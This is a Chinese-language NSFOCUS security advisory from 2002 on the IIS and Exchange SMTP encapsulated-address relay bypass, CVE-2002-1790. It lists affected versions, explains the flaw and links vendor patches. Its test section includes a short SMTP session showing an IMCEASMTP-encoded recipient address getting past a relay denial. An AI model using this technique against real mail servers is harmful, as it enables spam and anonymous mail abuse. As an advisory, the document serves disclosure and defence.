首页 -> 安全研究
安全研究
安全漏洞
Microsoft IIS SMTP服务封装SMTP地址漏洞
发布日期:2002-07-12
更新日期:2002-07-19
受影响系统:
Microsoft Exchange Server 5.5描述:
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows 2000 SP3
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
Microsoft Exchange Server 5.5SP1
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows 2000 SP3
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
Microsoft Exchange Server 5.5SP2
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows 2000 SP3
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
Microsoft IIS 4.0
- Microsoft Windows NT 4.0
Microsoft IIS 5.0
- Microsoft Windows 2000 SP3
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
BUGTRAQ ID: 5213
CVE(CAN) ID: CVE-2002-1790
Microsoft IIS SMTP是一款用于发送邮件的SMTP服务器。
Microsoft IIS SMTP存在封装SMTP地址漏洞,远程攻击者可以利用这个漏洞绕过RELAY规则,发送邮件。
IIS 4和5包含的SMTP服务存在与Microsoft Security Bulletin MS99-027 相同的漏洞,攻击者可以使用封装SMTP地址来发送邮件到任意用户,利用这个漏洞,攻击者可以绕过SMTP服务中配置的RELAY规则,执行滥用邮件资源和发送匿名邮件等操作。
Microsoft Security Bulletin MS99-027描述的漏洞当时只针对Microsoft Exchange Server 5.5,现在发现IIS 4和5包含的SMTP服务也同样存在此漏洞。
<*来源:JWC (JWC@portcullis-security.com)
链接:http://archives.neohapsis.com/archives/bugtraq/2002-07/0131.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
220 test-mailer Microsoft ESMTP MAIL Service, Version: 5.0.2195.4905 ready
at
Tue, 28 May 2002 14:54:10 +0100
helo
250 test-mailer Hello [IP address of source host]
MAIL FROM: test@test.com
250 2.1.0 test@test.com....Sender OK
RCPT TO: test2@test.com
550 5.7.1 Unable to relay for test@test.com
RCPT TO: IMCEASMTP-test+40test+2Ecom@victim.co.uk
250 2.1.5 IMCEASMTP-test+40test+2Ecom@victim.co.uk
data
354 Start mail input; end with <CRLF>.<CRLF>
Subject: You are vulnerable.
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 暂时没有合适的临时解决方法。
厂商补丁:
Microsoft
---------
微软当时提供的补丁只针对Microsoft Exchange Server 5.5,还没有针对IIS 4和5包含的SMTP服务提供补丁程序。
针对Microsoft Exchange Server 5.5服务的补丁如下,注意先安装service pack然后安装补丁程序:
Microsoft IIS 4.0:
Microsoft IIS 5.0:
Microsoft Exchange Server 5.5 SP2:
Microsoft Patch psp2imca.zip
ftp://ftp.microsoft.com/bussys/exchange/exchange-public/fixes/Eng/Exchg5.5/PostSP2/imc-fix/psp2imca.zip
Microsoft Patch psp2imci.zip
ftp://ftp.microsoft.com/bussys/exchange/exchange-public/fixes/Eng/Exchg5.5/PostSP2/imc-fix/psp2imci.zip
浏览次数:3803
严重程度:0(网友投票)
绿盟科技给您安全的保障